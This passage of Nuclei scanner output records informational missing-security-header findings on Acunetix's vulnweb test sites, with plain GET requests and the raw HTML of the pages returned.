name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.84388964Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:50.843943404Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.890586102Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:50.945729402Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 